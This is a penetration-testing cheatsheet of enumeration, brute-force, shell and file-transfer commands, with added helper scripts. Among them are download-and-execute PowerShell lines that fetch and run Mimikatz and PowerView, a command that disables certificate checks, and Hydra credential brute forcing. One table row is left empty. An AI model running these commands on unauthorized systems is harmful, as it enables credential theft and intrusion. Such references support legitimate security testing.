# Pentesting & Administration Cheatsheet
## File Search & Enumeration
| Task | Command | Description |
|---|---|---|
| Find SUID Files | find / -perm /4000 -type f 2>/dev/null |  Search for files with the SUID bit set | 
| Find Passwords in Windows Files | findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml |  Recursively (/S) and case-insensitively (/I) list the names (/M) of files containing the string "password" on Windows | 
| Tree without installing Tree | find "${1:-.}" -type d -print0 \| while IFS= read -r -d '' dir; do printf '\n== %s ==\n' "$dir"; ls -la -- "$dir" 2>/dev/null \|\| printf ' (error)\n'; done |  Recursively list the contents of every directory (default: current directory) as a substitute for tree | 
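The SUID search above returns every set-uid file on the box, most of which (passwd, sudo, mount, ...) are expected. What you actually want is the handful that are not expected, whether you are hunting a privilege-escalation path or auditing a host you administer. The following is an added example, not part of the original cheatsheet: it wraps the find into a function that also catches SGID files and diffs the result against a baseline list you supply (for instance from a clean build of the same image; the baseline file and the paths are assumptions of the example).

```shell
#!/usr/bin/env bash
# Added example, not part of the cheatsheet: enumerate set-uid/set-gid files
# under a directory and diff the result against a baseline list, so an
# unexpected SUID binary stands out from the dozens a normal install ships.
# Assumptions: bash or POSIX sh with find, sort and comm; the baseline file is
# something you produce yourself (e.g. from a clean build of the same image).

# List regular files with the SUID (4000) or SGID (2000) bit under DIR
# (default /), one absolute path per line, sorted. Permission errors are
# silenced so the listing is usable from an unprivileged shell.
find_setuid_files() {
    dir="${1:-/}"
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print entries of the live listing that are absent from the baseline.
# Both inputs are sorted uniquely into temp files first, because comm
# requires sorted input.
# Usage: suid_diff LIVE_LISTING BASELINE
suid_diff() {
    t1=$(mktemp) || return 1
    t2=$(mktemp) || return 1
    sort -u "$1" > "$t1"
    sort -u "$2" > "$t2"
    comm -23 "$t1" "$t2"
    rm -f "$t1" "$t2"
}

# Typical flow on a target (paths are placeholders):
#   find_setuid_files / > /tmp/suid-now.txt
#   suid_diff /tmp/suid-now.txt suid-baseline.txt
```

Anything `suid_diff` prints is either a binary the distribution added since the baseline was taken or something somebody dropped; check owner and package ownership (`ls -l`, `dpkg -S` / `rpm -qf`) before deciding which. Note that `-perm -4000` only reports the mode bit; a file on a `nosuid` mount carries the bit without gaining privilege, so confirm the mount options before spending time on it.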
## Shells & TTY
| Task | Command | Description |
|---|---|---|
| Full TTY via Python | python3 -c 'import pty; pty.spawn("/bin/bash")' |  Spawn a full TTY shell | 
| Stabilize TTY Shell | CTRL+Z; stty raw -echo; fg; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; |  Background the shell (CTRL+Z), put the local terminal in raw mode, foreground the shell, then set SHELL and TERM; replace 38/116 with your own terminal size (run stty size locally) so line editing and full-screen tools behave | 
## Brute Forcing
| Task | Command | Description |
|---|---|---|
| Bruteforce FTP with Hydra (Default Credentials) | hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://{IP} |  Try user:password pairs from a colon-separated default-credential list (-C) against FTP | 
| Bruteforce FTP with Hydra (Single User & Password List) | hydra -t 4 -l admin -P passwords.txt ftp://$target |  Bruteforce FTP with a fixed username (-l admin) and a password list (-P) using 4 parallel tasks (-t 4); use -L instead of -l for a username list | 
## Web Content Discovery
| Task | Command | Description |
|---|---|---|
| FFUF Medium Directory Search | ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ac -u http://{IP}/FUZZ |  Discover directories with ffuf; FUZZ marks where each wordlist entry is inserted (ffuf refuses to run without it) and -ac auto-calibrates the response filter to drop false positives | 
## Windows File Transfer
| Task | Command | Description |
|---|---|---|
| Base64 File Write | [IO.File]::WriteAllBytes("path/to/file/to/write", [Convert]::FromBase64String("")) |  Write raw bytes to disk from a Base64 string in PowerShell (paste the encoded content into the empty string) | 
| Download File via WebClient | (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') |  Download a file from a URL using PowerShell | 
| Download File Asynchronously | (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>') |  Download a file asynchronously using PowerShell | 
| Download and Execute Mimikatz | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') |  Download and execute Mimikatz script via PowerShell | 
| Download PowerView | Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 |  Download the PowerView script to disk using PowerShell | 
| Bypass SSL/TLS Errors | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} |  Disable certificate validation for the current PowerShell session only (affects WebClient and Windows PowerShell's Invoke-WebRequest); on PowerShell 6+ Invoke-WebRequest also accepts -SkipCertificateCheck | 
| Use Basic Parsing for Invoke-WebRequest | Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing \| IEX |  Download and execute a script in memory; -UseBasicParsing avoids the Internet Explorer DOM dependency in Windows PowerShell (it is the default, and a no-op, on PowerShell 6+) | 
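The Base64 write in the table is the fallback when nothing but a PowerShell prompt reaches the target, and the encoding step happens on your own machine. The following is an added example, not from the original cheatsheet: a small set of shell functions for the attacking host that build the WriteAllBytes/FromBase64String one-liner from a local file, record the SHA-256 you expect `Get-FileHash` to show on the target, and verify locally that the generated command round-trips the bytes. The file names and the Windows path are placeholders chosen by the caller.

```shell
#!/usr/bin/env bash
# Added example, not part of the cheatsheet: on the attacking host, turn a local
# file into the WriteAllBytes/FromBase64String one-liner and record the SHA-256
# you expect Get-FileHash to report on the target, so a truncated paste is
# caught before you try to run the dropped file.
# Assumptions: bash with coreutils (base64, sha256sum) or the macOS equivalents
# (shasum); the Windows path is a placeholder supplied by the caller.

# Print the PowerShell one-liner that recreates LOCAL_FILE at REMOTE_PATH.
# GNU base64 needs -w0 to suppress line wrapping; the fallback strips the
# newlines for implementations that lack -w.
# Usage: ps_b64_writer ./tool.exe 'C:\Windows\Temp\tool.exe'
ps_b64_writer() {
    b64=$(base64 -w0 "$1" 2>/dev/null || base64 "$1" | tr -d '\n')
    printf '[IO.File]::WriteAllBytes("%s", [Convert]::FromBase64String("%s"))\n' "$2" "$b64"
}

# SHA-256 of a file, or of stdin when called with "-" or no argument.
# Compare with:  (Get-FileHash REMOTE_PATH -Algorithm SHA256).Hash
# (PowerShell prints it upper-case; compare case-insensitively).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "${1:--}"
    else
        shasum -a 256 "${1:--}"
    fi | cut -d' ' -f1
}

# Local sanity check: pull the Base64 back out of the generated command, decode
# it the way FromBase64String will, and confirm the bytes match the source.
# Returns 0 on match, 1 otherwise.
ps_b64_roundtrip_ok() {
    cmd="$1"; src="$2"
    b64=$(printf '%s' "$cmd" | sed -n 's/.*FromBase64String("\([^"]*\)").*/\1/p')
    [ "$(printf '%s' "$b64" | base64 -d | sha256_of -)" = "$(sha256_of "$src")" ]
}
```

Two practical limits: a pasted command line is capped by the console (roughly 8 K characters through cmd.exe, 32 K inside PowerShell), so for anything beyond a few kilobytes write the Base64 to a file on the target and feed `[Convert]::FromBase64String((Get-Content payload.b64 -Raw))` instead of one giant line; and always compare the hash on both sides, since a clipboard or terminal that silently drops the tail of the paste still produces a file that FromBase64String may accept.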
## Nmap MSSQL Scripts
| Task | Command | Description |
|---|---|---|
| MSSQL Nmap Enumeration | sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 [host] |  Run multiple MSSQL-related scripts with Nmap | 
| Add a route through a compromised machine | | |
## File Transfer with SCP
| Task | Command | Description |
|---|---|---|
| Copy File from Local to Remote | scp /path/to/local/file user@remote:/path/to/remote |  Copy a local file to a remote host over SSH | 